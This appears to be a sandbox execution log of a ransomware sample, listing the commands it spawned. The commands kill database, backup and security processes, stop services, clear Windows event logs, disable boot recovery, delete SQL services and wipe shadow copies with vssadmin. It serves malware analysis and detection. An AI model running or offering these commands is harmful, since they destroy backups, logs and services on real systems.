C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mdm.exe /F
4⤵
PID:2664

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExecManagementService.exe /F
4⤵
- Kills process with taskkill
PID:6016

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM bengine.exe /F
4⤵
PID:5316

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM benetns.exe /F
4⤵
PID:4048

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beserver.exe /F
4⤵
PID:2676

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pvlsvr.exe /F
4⤵
PID:1244

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
3⤵
PID:5332

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pg_ctl.exe /F
4⤵
PID:6000

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rcrelay.exe /F
4⤵
PID:1400

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SogouImeBroker.exe /F
4⤵
PID:3876

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM CCenter.exe /F
4⤵
PID:2388

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ScanFrm.exe /F
4⤵
PID:5452

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM d_manage.exe /F
4⤵
PID:5584

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RsTray.exe /F
4⤵
- Kills process with taskkill
PID:4748

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wampmanager.exe /F
4⤵
PID:268

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
3⤵
PID:216

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ThunderPlatform.exe /F
4⤵
PID:1688

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM iexplore.exe /F
4⤵
PID:4868

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-agent.exe /F
4⤵
PID:5676

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-agent-daemon.exe /F
4⤵
PID:4608

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM eSightService.exe /F
4⤵
PID:3752

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cygrunsrv.exe /F
4⤵
PID:2532

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wrapper.exe /F
4⤵
PID:5740

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM nginx.exe /F
4⤵
PID:6120

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
3⤵
PID:5804

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlservr.exe /F
4⤵
- Kills process with taskkill
PID:1164

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM httpd.exe /F
4⤵
PID:5700

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM java.exe /F
4⤵
- Kills process with taskkill
PID:4780

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fdhost.exe /F
4⤵
PID:5240

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fdlauncher.exe /F
4⤵
PID:3440

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM reportingservicesservice.exe /F
4⤵
PID:1268

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM softmgrlite.exe /F
4⤵
PID:5008

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlbrowser.exe /F
4⤵
PID:5452

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
3⤵
PID:4820

C:\Windows\SysWOW64\net.exe
net stop UIODetect
4⤵
PID:4352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UIODetect
5⤵
PID:5972

C:\Windows\SysWOW64\net.exe
net stop VMwareHostd
4⤵
PID:4740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMwareHostd
5⤵
PID:4348

C:\Windows\SysWOW64\net.exe
net stop TeamViewer8
4⤵
- Discovers systems in the same network
PID:3888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer8
5⤵
PID:2452

C:\Windows\SysWOW64\net.exe
net stop VMUSBArbService
4⤵
PID:1132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMUSBArbService
5⤵
PID:5744

C:\Windows\SysWOW64\net.exe
net stop VMAuthdService
4⤵
PID:6040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMAuthdService
5⤵
PID:4916

C:\Windows\SysWOW64\net.exe
net stop wanxiao-monitor
4⤵
PID:5500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wanxiao-monitor
5⤵
PID:5448

C:\Windows\SysWOW64\net.exe
net stop WebAttendServer
4⤵
PID:5220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WebAttendServer
5⤵
PID:4352

C:\Windows\SysWOW64\net.exe
net stop mysqltransport
4⤵
PID:2368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mysqltransport
5⤵
PID:3440

C:\Windows\SysWOW64\net.exe
net stop VMnetDHCP
4⤵
PID:2308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMnetDHCP
5⤵
PID:5380

C:\Windows\SysWOW64\net.exe
net stop "VMware NAT Service"
4⤵
PID:3568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VMware NAT Service"
5⤵
PID:3148

C:\Windows\SysWOW64\net.exe
net stop Tomcat8
4⤵
PID:5596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Tomcat8
5⤵
PID:5304

C:\Windows\SysWOW64\net.exe
net stop TeamViewer
4⤵
- Discovers systems in the same network
PID:5752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer
5⤵
PID:1072

C:\Windows\SysWOW64\net.exe
net stop QPCore
4⤵
PID:784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QPCore
5⤵
PID:5144

C:\Windows\SysWOW64\net.exe
net stop CASLicenceServer
4⤵
PID:5412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASLicenceServer
5⤵
PID:364

C:\Windows\SysWOW64\net.exe
net stop CASWebServer
4⤵
PID:4244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASWebServer
5⤵
PID:4056

C:\Windows\SysWOW64\net.exe
net stop AutoUpdateService
4⤵
PID:3224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AutoUpdateService
5⤵
PID:3944

C:\Windows\SysWOW64\net.exe
net stop "Alibaba Security Aegis Detect Service"
4⤵
PID:876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
5⤵
PID:4484

C:\Windows\SysWOW64\net.exe
net stop "Alibaba Security Aegis Update Service"
4⤵
PID:5708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
5⤵
PID:5164

C:\Windows\SysWOW64\net.exe
net stop "AliyunService"
4⤵
PID:5416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "AliyunService"
5⤵
PID:5780

C:\Windows\SysWOW64\net.exe
net stop CASXMLService
4⤵
PID:2012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASXMLService
5⤵
PID:6048

C:\Windows\SysWOW64\net.exe
net stop AGSService
4⤵
PID:6084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AGSService
5⤵
PID:5448

C:\Windows\SysWOW64\net.exe
net stop RapService
4⤵
PID:6112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RapService
5⤵
PID:4608

C:\Windows\SysWOW64\net.exe
net stop DDNSService
4⤵
PID:200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DDNSService
5⤵
PID:5988

C:\Windows\SysWOW64\net.exe
net stop iNethinkSQLBackupSvc
4⤵
PID:4496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
5⤵
PID:5240

C:\Windows\SysWOW64\net.exe
net stop CASVirtualDiskService
4⤵
PID:1140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASVirtualDiskService
5⤵
PID:4524

C:\Windows\SysWOW64\net.exe
net stop CASMsgSrv
4⤵
PID:1404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASMsgSrv
5⤵
PID:1188

C:\Windows\SysWOW64\net.exe
net stop "OracleOraDb10g_homeliSQL*Plus"
4⤵
PID:236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WEVTUTIL EL
3⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL EL
4⤵
PID:6096

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "AirSpaceChannel"
3⤵
- Clears Windows event logs
PID:5204

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Analytic"
3⤵
PID:5216

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Application"
3⤵
PID:5248

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "DirectShowFilterGraph"
3⤵
PID:5492

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "DirectShowPluginControl"
3⤵
PID:4380

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Els_Hyphenation/Analytic"
3⤵
PID:5080

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "EndpointMapper"
3⤵
PID:4532

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "FirstUXPerf-Analytic"
3⤵
PID:5452

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "ForwardedEvents"
3⤵
- Clears Windows event logs
PID:1688

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "General Logging"
3⤵
- Clears Windows event logs
PID:5628

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "HardwareEvents"
3⤵
PID:6000

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "IHM_DebugChannel"
3⤵
PID:5080

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"
3⤵
PID:2552

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"
3⤵
PID:212

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"
3⤵
PID:4316

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"
3⤵
- Clears Windows event logs
PID:6012

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"
3⤵
PID:2156

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-I2C/Performance"
3⤵
PID:5460

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Internet Explorer"
3⤵
PID:5756

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Key Management Service"
3⤵
- Clears Windows event logs
PID:4816

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
3⤵
PID:832

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MedaFoundationVideoProc"
3⤵
PID:5192

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MedaFoundationVideoProcD3D"
3⤵
- Clears Windows event logs
PID:5476

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MediaFoundationAsyncWrapper"
3⤵
PID:4056

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MediaFoundationContentProtection"
3⤵
- Clears Windows event logs
PID:1564

C:\Users\Admin\Downloads\a-Xgjsx.exe
C:\Users\Admin\Downloads\a-Xgjsx.exe
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:2104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
3⤵
PID:4792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
3⤵
PID:3944

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
4⤵
- Launches sc.exe
PID:2460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
3⤵
PID:3880

C:\Windows\System32\vssadmin.exe
"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:5088

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2372

